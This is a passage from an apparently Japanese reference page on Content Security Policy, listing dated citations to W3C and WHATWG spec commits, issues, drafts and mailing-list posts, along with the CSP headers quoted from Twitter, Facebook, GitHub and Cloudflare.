https://pbs.twimg.com; default-src 'self'; frame-src https://staticxx.facebook.com https://twitter.com https://*.twimg.com https://player.vimeo.com https://pay.twitter.com https://www.facebook.com https://ton.twitter.com https://syndication.twitter.com https://vine.co twitter: https://www.youtube.com https://platform.twitter.com https://upload.twitter.com https://s-static.ak.facebook.com 'self' https://donate.twitter.com; img-src https://graph.facebook.com https://*.giphy.com https://twitter.com https://*.twimg.com data: https://fbcdn-profile-a.akamaihd.net https://www.facebook.com https://ton.twitter.com https://*.fbcdn.net https://syndication.twitter.com https://media.riffsy.com https://www.google.com https://stats.g.doubleclick.net https://*.tiles.mapbox.com https://www.google-analytics.com blob: 'self'; report-uri https://twitter.com/i/csp_report?a=NVQXGYLXFVYXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;

]FIG]


[125] [CITE@en[Change to expression matching algorithm (#71) · w3c/webappsec-csp@e6d9233]]
([TIME[2016-04-18 13:02:38 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/e6d92335d0b9797fa72517c16dda01dd8e761449>

[126] [CITE@en[Define 'Content Security Policy'. · w3c/webappsec-csp@b98e59b]]
([TIME[2016-04-21 12:03:26 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/b98e59bd478435577f78699e65ee135954e2ce42>

[127] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-04-25 18:02:58 +09:00]] 版)
<https://www.w3.org/TR/2016/WD-CSP3-20160425/>

[128] [CITE@en[Allow hashes to match external scripts · w3c/webappsec-csp@a299d38]]
([TIME[2016-04-26 12:11:05 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/a299d38d1b54e3d9612d11fb69cc8174b5e44051>

[129] [CITE@en[Fix up the logic in source list matching (#74)]]
( ([[shekyan]]著, [TIME[2016-05-03 18:53:58 +09:00]]))
<https://github.com/w3c/webappsec-csp/commit/8c1b6a88777374c3b47976fb5d4201d449a679f1>

[130] [CITE@en[Fold CSPDOCUMENT into CSP.]]
( ([[mikewest]]著, [TIME[2016-05-23 12:05:43 +09:00]]))
<https://github.com/w3c/webappsec-csp/commit/0cd4bf42b5e78168cd85efe798a9a5e719677b8e>

[131] [CITE@en[Updating references from CSPDOCUMENT to CSP]]
( ([[mikewest]]著, [TIME[2016-05-23 15:34:43 +09:00]]))
<https://github.com/whatwg/html/commit/c90e53cfa0d4ae43110589ea7c2718b65be3fda7>

[FIG(quote)[
[FIGCAPTION[
[132] [CITE[CloudFlare - The web performance & security company]]
( ([TIME[2016-05-19 04:03:42 +09:00]]))
<https://www.cloudflare.com/>
]FIGCAPTION]

> Content-Security-Policy: default-src 'self' https://*; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://* data:; img-src 'self' https://* data:; style-src 'self' 'unsafe-inline' https://*; font-src 'self' https://* data:; frame-src https://*; connect-src 'self' https://* wss://*.zopim.com data:;
> 

]FIG]


[FIG(quote)[
[FIGCAPTION[
[133] [CITE@en-US[Chrome incompatibilities - Mozilla | MDN]]
( ([TIME[2016-06-14 10:15:04 +09:00]]))
<https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Chrome_incompatibilities>
]FIGCAPTION]

> content_security_policy
> Firefox does not support:
> "http://127.0.0.1" or "http://localhost" as script sources: they must be served over HTTPS.

]FIG]


[134] [CITE@en-US[Content Security Policy - Mozilla | MDN]]
( ([TIME[2016-05-28 19:17:23 +09:00]]))
<https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Content_Security_Policy>

[135] [CITE@en[Content Security Policy Level 3]]
( ([TIME[2016-06-21 19:25:50 +09:00]]))
<https://www.w3.org/TR/2016/WD-CSP3-20160621/>

[136] [CITE@en[Add IANA considerations section referencing `require-sri-for`]]
([[shekyan]]著, [TIME[2016-06-23 02:17:37 +09:00]])
<https://github.com/w3c/webappsec-subresource-integrity/commit/853ab1bd8815e23001a24c57b68f424cdd09f0b5>

[FIG(quote)[
[FIGCAPTION[
[137] [CITE@en[amphtml/amp-html-format.md at master · ampproject/amphtml]]
([TIME[2016-07-04 11:16:59 +09:00]])
<https://github.com/ampproject/amphtml/blob/master/spec/amp-html-format.md>
]FIGCAPTION]

> AMP HTML documents must not trigger errors when served with a Content Security Policy that does not include the keywords unsafe-inline and unsafe-eval.

]FIG]


[FIG(quote)[
[FIGCAPTION[
[140] [CITE@en[Call for Consensus: Stop work and transition 3 Working Drafts to  Working Group Notes]]
([[Brad Hill]]著, [TIME[2016-07-13 06:33:27 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jul/0013.html>
]FIGCAPTION]

> CSP Cookie Controls
> https://www.w3.org/TR/csp-cookies/
> Last updated ~6 months ago.
> Reason to transition to Note: The Feature Policy proposal (
> https://wicg.github.io/feature-policy/) could be a better home for the
> intended functionality as part of a broader and more coherent approach,
> rather than putting this into CSP.

]FIG]


[FIG(quote)[
[FIGCAPTION[
[141] [CITE@en[Call for Consensus: Stop work and transition 3 Working Drafts to  Working Group Notes]]
([[Brad Hill]]著, [TIME[2016-07-13 06:33:27 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jul/0013.html>
]FIGCAPTION]

> CSP Pinning
> https://www.w3.org/TR/csp-pinning/
> Last updated ~6 months ago.
> Reason to transition to Note: While this kind of feature is still
> considered useful, like Cookie Controls and Feature Policy, the editor
> feels it would be better managed as part of a more generalized strategy for
> header pinning, and as part of that, with a strategy perhaps along the
> lines of a manifest, well-known resource or service worker that doesn't
> incur the cost of sending the pinning header with every request.

]FIG]


[142] [CITE@en[Transition Cookie Controls and Pinning to NOTE status (#103)]]
([[hillbrad]]著, [TIME[2016-08-02 03:53:52 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/d3705f5c4fda042345bfb1457388ba9c27c69420>

[143] [CITE@en[Pass |origin| into matching algorithms.]]
([[@shekyan]]著, [TIME[2016-08-16 17:21:01 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/3739f6f1b1406c3c88757803859aeb6836028d38>

[144] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-08-18 17:25:03 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160818/>

[145] [CITE@en[Allow "*" to match scheme of protected resource (#105)]]
([[shekyan]]著, [TIME[2016-08-19 14:24:12 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/22c3ab8ff872668b2454227e87427e8677f4db7c>

[146] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-09-01 17:55:20 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160901/>

[147] [CITE@en[path -> path-abempty. Closes w3c/webappsec-csp#89.]]
([[mikewest]]著, [TIME[2016-09-02 23:40:20 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/039136ff232995b7573059dbe34c9df3f67a2335>

[148] [CITE[A Refined Content Security Policy | WebKit]]
([TIME[2016-09-04 22:40:23 +09:00]])
<https://webkit.org/blog/6830/a-refined-content-security-policy/>

[149] [CITE@en[generate note versions of obsolete specs]]
([[hillbrad]]著, [TIME[2016-09-04 05:58:14 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/b33ff0aed91c085ebcf1776cc9271f0fc412e678>

[150] [CITE@en[Updating to get things in line with the current CSP and HTML specs.]]
([[mikewest]]著, [TIME[2016-09-09 18:55:24 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/380667c81cea337a78ccc5d1a7ded4976680fa8e>

[151] [CITE@en[Content Security Policy: Embedded Enforcement]]
([TIME[2016-09-09 18:56:58 +09:00]])
<https://www.w3.org/TR/2016/WD-csp-embedded-enforcement-20160909/>

[152] [CITE@en[CSP: Embedded Enforcement]]
([[Mike West]]著, [TIME[2016-09-09 19:03:25 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Sep/0033.html>

[153] [CITE@en[Content Security Policy: Cookie Controls]]
([TIME[2016-09-13 00:50:28 +09:00]])
<https://www.w3.org/TR/2016/NOTE-csp-cookies-20160913/>

[154] [CITE@en[Content Security Policy Pinning]]
([TIME[2016-09-12 23:41:57 +09:00]])
<https://www.w3.org/TR/2016/NOTE-csp-pinning-20160913/>

[155] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-09-13 21:59:07 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160913/>

[156] [CITE@en[Update IDL to introduce SecurityPolicyVioationEventDisposition type (#…]]
([[shekyan]]著, [TIME[2016-10-06 23:27:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/54cdc310b087a61ddff4a79fb8706c55e5b6dc2d>

[157] [CITE@en[Report destination.]]
([[mikewest]]著, [TIME[2016-10-14 21:33:02 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/9c5d9f662bee1948e23ab908c2b9ac65b0a8e291>

[158] [CITE@en[Use request's "current url" rather than "url". (#135)]]
([[@estark37]]著, [TIME[2016-11-06 17:29:01 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/8a88c0cf306b34da6a8fee7cfa574ff9fa34740c>

[159] [CITE@en[Content Security Policy Level 2]]
([TIME[2016-11-05 00:37:05 +09:00]])
<https://www.w3.org/TR/2016/PR-CSP2-20161108/>

[160] [CITE@en[Clarify fetch settings for reporting. (#139)]]
([[jdalton]]著, [TIME[2016-11-08 17:34:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/558282b4ea040191066cae4a028dab83a886166a>

[161] [CITE@en[Adding CSPSource subsumption (#138)]]
([[Sun77789]]著, [TIME[2016-11-08 18:31:22 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/928d62261496965f16dcf5fddc5d943670d7f963>

[162] [CITE@en[Handle navigation to `javascript:` URLs as inline script. (#142)]]
([[@bzbarsky]]著, [TIME[2016-11-10 17:07:39 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/479bf6c6e891db0bb1cd7f71be764f3aff6a1a33>

[163] [CITE@en[Change the model for workers.]]
([[mikewest]]著, [TIME[2016-11-29 23:24:18 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/1af72ed19bf952402c514b7e7a966fb234d63217>

[164] [CITE@en[Finding effective directive for a given name (#153)]]
([[Sun77789]]著, [TIME[2016-12-08 20:58:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/4c10ab80cf996a35106b2c2f4e5a78fbb6fa819f>

[165] [CITE@en[Intersection of serialized source lists (#157)]]
([[Sun77789]]著, [TIME[2016-12-13 18:29:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/59b2839f98e491d0170d1389c6fd857d44b92247>

[166] [CITE@en[Adding intersection of two policies (#163)]]
([[Sun77789]]著, [TIME[2016-12-13 23:21:48 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/317b919cd5819cca0d490b1034f8b9b88abeda16>

[167] [CITE@en[Intersection of a set of policies (#164)]]
([[Sun77789]]著, [TIME[2016-12-13 23:58:14 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/d66e1e348bb4c91b91123c2e3b9b4d326f6b9f8b>

[168] [CITE@en[EE: Effective source list (#165)]]
([[Sun77789]]著, [TIME[2016-12-14 00:01:20 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/23fb3a53e0701a7c4ac971d6b9fc14aab6e77a41>

[169] [CITE@en[EE: Response's CSP list subsumption (#168)]]
([[Sun77789]]著, [TIME[2016-12-14 00:10:40 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/716e7196f1e2b5e4de94bf5bfcddb8660f04ac81>

[170] [CITE@en[Adding issues to take care of the cascade.]]
([[mikewest]]著, [TIME[2016-12-18 00:59:49 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/671fcb45caf6e524179bcbfd71fe68e37660f8b6>

[171] [CITE@en[EE: Cleaning up HTML integration.]]
([[mikewest]]著, [TIME[2016-12-19 22:16:41 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/730b36f3ab9492fcf6f2339d23a15319ca6a779d>

[172] [CITE@en[Restructuring intersection.]]
([[mikewest]]著, [TIME[2016-12-20 19:36:00 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/0e9ae5fc8237359a37000fe6b38c6f508c84bf2b>

[173] [CITE@en[`<iframe srcdoc="<script>">` should not execute when inserted via `innerHTML`. · Issue #2300 · whatwg/html]]
([TIME[2017-01-27 22:34:34 +09:00]])
<https://github.com/whatwg/html/issues/2300>

[177] [CITE@en[Re: Add ability to specify the version of used CSP]]
([[Mike West]]著, [TIME[2017-03-20 23:00:02 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2017Mar/0025.html>

[178] [CITE@en[Copy/paste 'paths and redirects' from CSP2.]]
([[mikewest]]著, [TIME[2017-05-09 22:17:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/402ebd330cd652417d5434d33acba60091a48709>

[179] [CITE@en[Track the source of a given policy. (#214)]]
([[mikewest]]著, [TIME[2017-05-24 19:41:40 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/1082da46cf89a7e5c4ea298a072aab4580aa1e60>

[180] [CITE@en[Polishing {scheme,host,port,path}-matching algorithms.]]
([[mikewest]]著, [TIME[2017-05-31 19:44:52 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/75fca786bd55e665e39774aa9b52e3fc3e38db66>

[181] [CITE@en[The 'csp' IDL attribute reflects the content attribute.]]
([[@foolip]]著, [TIME[2017-06-01 21:22:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/3ac127abb700a5d36ff69b4e4afe7b68c91afd9d>

[182] [CITE@en['''['''Execute Script''']''' Note about CSP policies being ignored.]]
([[shs96c]]著, [TIME[2017-08-23 22:14:13 +09:00]])
<https://github.com/w3c/webdriver/commit/c0cc934c652ef0393ca0317ce3b7b290c0bf47df>

[183] [CITE@en[Ask for web-platform-tests in CONTRIBUTING.md (#230)]]
([[foolip]]著, [TIME[2017-09-11 15:54:04 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/6b0476da5dfc661d6aed84f2cb2fa1f5aa0826e9>

[184] [CITE@en[Ask for web-platform-tests in CONTRIBUTING.md by foolip · Pull Request #230 · w3c/webappsec-csp]]
([TIME[2017-09-12 11:42:52 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/230>

[185] [CITE@en[Cleanup `global object` usage to make sense with `Documents` (#254)]]
([[andypaicu]]著, [TIME[2017-11-30 19:48:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/80bf6a439a744ebc7cb1b6d7373d0f0236d3584b>

[186] [CITE@en[Cleanup `global object` usage to make sense with `Documents` by andypaicu · Pull Request #254 · w3c/webappsec-csp]]
([TIME[2017-12-01 23:59:23 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/254>

[187] [CITE@en[Replaced 'alias' with 'copy' for less ambiguity (#273)]]
([[andypaicu]]著, [TIME[2017-12-01 20:12:27 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/2c0f4aa08621556a34c245345fcfb41ef899af6b>

[188] [CITE@en[Replaced 'alias' with 'copy' for less ambiguity by andypaicu · Pull Request #273 · w3c/webappsec-csp]]
([TIME[2017-12-05 17:38:22 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/273>

[189] [CITE@en[What does it mean to alias a policy from a CSP list? · Issue #207 · w3c/webappsec-csp]]
([TIME[2017-12-05 17:40:56 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/207>

[190] [CITE@en[23357 – Subverting CSP policies for browser add-ons (extensions).]]
([TIME[2018-01-18 13:20:48 +09:00]])
<https://www.w3.org/Bugs/Public/show_bug.cgi?id=23357>

[191] [CITE@en[CSP 1.1: Remove note about extensions.]]
([[mikewest]]著, [TIME[2014-01-30 01:11:09 +09:00]])
<https://github.com/w3c/webappsec/commit/cbfaa8edfadebf21a9c7428242c12e45934d8c55>

[192] [CITE@en[CSP vulnerability enabling cross-origin session data exfiltration · Issue #289 · w3c/webappsec-csp]]
([TIME[2018-01-27 17:01:57 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/289>

[193] [CITE@en[Hide nonce content attribute values]]
([[mikewest]]著, [TIME[2017-11-23 00:15:47 +09:00]])
<https://github.com/whatwg/html/commit/19f5cce801550d278b9459f8c4797f9f86aae864>

[194] [CITE@en[Consider hiding `nonce` content attributes. · Issue #2369 · whatwg/html]]
([TIME[2018-02-17 23:20:59 +09:00]])
<https://github.com/whatwg/html/issues/2369>

[FIG(quote)[
[FIGCAPTION[
[195] [CITE@ja[Twitter名前検索]]
([TIME[2018-04-14 19:55:29 +09:00]])
<https://twitter.com/search-home>
]FIGCAPTION]

> content-security-policy:script-src https://connect.facebook.net https://cm.g.doubleclick.net https://ssl.google-analytics.com https://graph.facebook.com 'nonce-OYd+Tgp6EYGXSARn0PRbbg==' https://twitter.com 'unsafe-eval' https://*.twimg.com https://api.twitter.com https://analytics.twitter.com https://publish.twitter.com https://ton.twitter.com https://syndication.twitter.com https://www.google.com https://t.tellapart.com https://platform.twitter.com https://www.google-analytics.com blob: 'self'; frame-ancestors 'self'; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com https://fonts.gstatic.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; media-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://v.cdn.vine.co https://dwo3ckksxlb0v.cloudfront.net https://twitter.com https://amp.twimg.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://prod-video-eu-west-1.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-us-west-2.pscp.tv https://prod-video-us-west-1.pscp.tv https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://ton.twitter.com https://rmdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://mtc.cdn.vine.co https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv blob: 'self' https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; connect-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://graph.facebook.com https://*.giphy.com https://dwo3ckksxlb0v.cloudfront.net https://vmaprel.snappytv.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://embed.pscp.tv https://api.twitter.com https://prod-video-eu-west-1.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-us-west-2.pscp.tv https://pay.twitter.com https://prod-video-us-west-1.pscp.tv https://analytics.twitter.com https://vmap.snappytv.com https://*.twprobe.net https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://syndication.twitter.com https://sentry.io https://rmdhdsnappytv-vh.akamaihd.net https://media.riffsy.com https://mmdhdsnappytv-vh.akamaihd.net https://embed.periscope.tv https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://vmapstage.snappytv.com https://upload.twitter.com https://proxsee.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv 'self' https://vmap.grabyo.com https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; style-src https://fonts.googleapis.com https://twitter.com https://*.twimg.com https://translate.googleapis.com https://ton.twitter.com 'unsafe-inline' https://platform.twitter.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; object-src https://twitter.com https://pbs.twimg.com; default-src 'self' blob:; frame-src https://staticxx.facebook.com https://twitter.com https://*.twimg.com https://5415703.fls.doubleclick.net https://player.vimeo.com https://pay.twitter.com https://www.facebook.com https://ton.twitter.com https://syndication.twitter.com https://vine.co twitter: https://www.youtube.com https://platform.twitter.com https://upload.twitter.com https://s-static.ak.facebook.com https://4337974.fls.doubleclick.net https://8122179.fls.doubleclick.net 'self' https://donate.twitter.com; img-src https://graph.facebook.com https://*.giphy.com https://*.pscp.tv https://twitter.com https://*.twimg.com https://ad.doubleclick.net data: https://clips-media-assets.twitch.tv https://lumiere-a.akamaihd.net https://fbcdn-profile-a.akamaihd.net https://www.facebook.com https://ton.twitter.com https://*.fbcdn.net https://syndication.twitter.com https://media.riffsy.com https://www.google.com https://stats.g.doubleclick.net https://platform.twitter.com https://api.mapbox.com https://www.google-analytics.com blob: https://*.periscope.tv 'self'; report-uri https://twitter.com/i/csp_report?a=NVQWGYSXFVZXO24GOQ%3D%3D%3D%3D%3D%3D&ro=false;

]FIG]


[FIG(quote)[
[FIGCAPTION[
[196] [CITE@ja[Facebook - ログインまたは登録]]
([TIME[2018-04-14 19:59:33 +09:00]])
<https://www.facebook.com/>
]FIGCAPTION]

> content-security-policy:default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' fbstatic-a.akamaihd.net fbcdn-static-b-a.akamaihd.net *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* *.akamaihd.net wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;

]FIG]


[FIG(quote)[
[FIGCAPTION[
[197] [CITE@en[GitHub]]
([TIME[2018-04-14 20:03:16 +09:00]])
<https://github.com/>
]FIGCAPTION]

> Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com collector.githubapp.com api.github.com www.google-analytics.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; img-src 'self' data: assets-cdn.github.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com *.githubusercontent.com; manifest-src 'self'; media-src 'none'; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com; worker-src 'self'
> 

]FIG]


[198] [CITE@en[Editorial: set response's CSP list once]]
([[annevk]]著, [TIME[2018-04-17 20:27:15 +09:00]])
<https://github.com/whatwg/fetch/commit/860922f2c393c1b5408af7a80771c665b69a5bf7>

[199] [CITE@en[Should "set response's CSP list" be in Main fetch? · Issue #364 · whatwg/fetch]]
([TIME[2018-04-18 13:46:51 +09:00]])
<https://github.com/whatwg/fetch/issues/364>

[200] [CITE@en[Set response's CSP list once by annevk · Pull Request #701 · whatwg/fetch]]
([TIME[2018-04-18 13:47:46 +09:00]])
<https://github.com/whatwg/fetch/pull/701>

[201] [CITE@en[Editorial: lowercase content-security-policy <meta http-equiv> value]]
([[annevk]]著, [TIME[2018-04-28 01:45:22 +09:00]])
<https://github.com/whatwg/html/commit/e6a29247387e8f362654b280f72f746328667352>

[202] [CITE@en[Editorial: lowercase content-security-policy <meta http-equiv> value by annevk · Pull Request #3654 · whatwg/html]]
([TIME[2018-05-03 10:54:03 +09:00]])
<https://github.com/whatwg/html/pull/3654>

[203] [CITE@en[23357 – Subverting CSP policies for browser add-ons (extensions).]]
([TIME[2018-05-06 15:41:33 +09:00]])
<https://www.w3.org/Bugs/Public/show_bug.cgi?id=23357>

[204] [CITE@en[Refactored fetch directives for readability and logic. (#318)]]
([[andypaicu]]著, [TIME[2018-08-17 23:10:24 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/937f02478703c5eccfa56036712b514b08b3b700>

[205] [CITE@en[Refactored fetch directives for readability and logic. by andypaicu · Pull Request #318 · w3c/webappsec-csp]]
([TIME[2018-08-23 18:49:10 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/318>

[206] [CITE@en[Using the correct directive name when reporting violations (#337)]]
([[andypaicu]]著, [TIME[2018-10-04 18:31:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/10294d4e51598dc67106ab51aee144fcf89e5c44>

[207] [CITE@en[Using the correct directive name when reporting violations by andypaicu · Pull Request #337 · w3c/webappsec-csp]]
([TIME[2018-10-22 01:18:23 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/337>

[208] [CITE@en[The effective directive for violations is incorrect · Issue #324 · w3c/webappsec-csp]]
([TIME[2018-10-22 01:18:30 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/324>

[209] [CITE@en[Fixing whitespace issues and 2 comments in the area (#340)]]
([[andypaicu]]著, [TIME[2018-10-08 19:08:35 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/7c675fc237e300c574f41101f502f51c6398c71a>

[210] [CITE@en[Fixing whitespace issues and 2 comments in the area by andypaicu · Pull Request #340 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:48:52 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/340>

[211] [CITE@en[Update comment of directive value parsing · Issue #307 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:03 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/307>

[212] [CITE@en[Grammar: Clarity regarding constraints applied to path-part (path-absolute) production · Issue #303 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:22 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/303>

[213] [CITE@en[CSP: clarify whitespace characters · Issue #5 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:39 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/5>

[214] [CITE@en[Directive names should be lowercased (basically case-insensitive) (#346)]]
([[andypaicu]]著, [TIME[2018-10-08 22:17:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/5c4813650bc2c4f39262ceedf50a92440eb182c7>

[215] [CITE@en[Directive names should be lowercased (basically case-insensitive) (#346)]]
([[andypaicu]]著, [TIME[2018-10-08 22:17:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/5c4813650bc2c4f39262ceedf50a92440eb182c7>

[216] [CITE@en[Directive names should be lowercased (basically case-insensitive) by andypaicu · Pull Request #346 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:43 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/346>

[217] [CITE@en[Directive names should be lowercased (basically case-insensitive) by andypaicu · Pull Request #346 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:43 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/346>

[218] [CITE@en[Case-sensitivity resulting in divergent browser behavior · Issue #236 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:56 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/236>

[219] [CITE@en[Case-sensitivity resulting in divergent browser behavior · Issue #236 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:56 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/236>

[220] [CITE@en[Updated published WD.]]
([[mikewest]]著, [TIME[2018-10-15 16:37:25 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/0e11091019856f6a4e2deba233787e7822c289d7>

[221] [CITE@en[Clone <iframe srcdoc>'s node document's CSP list]]
([[annevk]]著, [TIME[2018-10-12 16:32:38 +09:00]])
<https://github.com/whatwg/html/commit/ebf6d404858bd3d75ec29b4899866935a74c6dc6>

[222] [CITE@en[What does it mean to alias a policy from a CSP list? · Issue #207 · w3c/webappsec-csp]]
([TIME[2018-11-06 16:21:15 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/207>

[223] [CITE@en[Is srcdoc aliasing its parent's CSP or copying it? · Issue #2594 · whatwg/html]]
([TIME[2018-11-06 16:21:55 +09:00]])
<https://github.com/whatwg/html/issues/2594>

[224] [CITE@en[Clone <iframe srcdoc>'s node document's CSP list by annevk · Pull Request #4083 · whatwg/html]]
([TIME[2018-11-06 16:22:45 +09:00]])
<https://github.com/whatwg/html/pull/4083>

[225] [CITE@en[Added a note about fetch redirects being covered (#359)]]
([[andypaicu]]著, [TIME[2018-11-06 18:28:59 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/df35fe41260ecd426e7f33dfa6bc1e0b432e1424>

[226] [CITE@en[Added a note about fetch redirects being covered by andypaicu · Pull Request #359 · w3c/webappsec-csp]]
([TIME[2019-03-08 12:27:50 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/359>